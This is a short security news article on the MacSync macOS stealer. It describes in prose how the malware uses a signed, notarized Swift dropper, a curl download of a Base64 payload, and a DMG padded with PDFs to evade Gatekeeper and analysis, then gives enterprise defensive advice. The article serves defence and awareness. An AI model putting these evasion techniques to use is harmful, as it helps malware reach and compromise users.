New MacSync macOS Stealer Uses Signed App to Bypass Apple Gatekeeper

The emergence of signed, notarized macOS malware marks a turning point in threat actor tactics. By obtaining legitimate code‑signing certificates, attackers can sidestep Apple’s Gatekeeper and XProtect, presenting malicious binaries as trustworthy applications. This approach not only reduces friction for victims but also complicates traditional signature‑based defenses, forcing security teams to rely on behavioral analytics and reputation services.

MacSync exemplifies this evolution. The Swift‑based dropper resides in a DMG named "zk‑call‑messenger‑installer-3.9.2‑lts.dmg" and uses a split‑flag curl command (‑fL ‑sS with --noproxy) to retrieve a Base64‑encoded payload. The installer inflates its size to 25.5 MB by embedding unrelated PDFs, a tactic that thwarts quick static analysis. Once decoded, the payload activates a Go‑written agent capable of remote command‑and‑control, extending the malware beyond simple credential theft to full‑fledged backdoor functionality.

For enterprises, the rise of signed macOS threats demands a reassessment of endpoint security posture. Relying solely on Apple’s built‑in protections is insufficient; organizations should deploy advanced EDR solutions that monitor anomalous execution patterns, such as unexpected DMG launches or network calls to obscure domains. Regularly auditing code‑signing certificates, enforcing strict application allowlists, and educating users about the risks of right‑click‑open prompts are essential steps to mitigate this growing vector.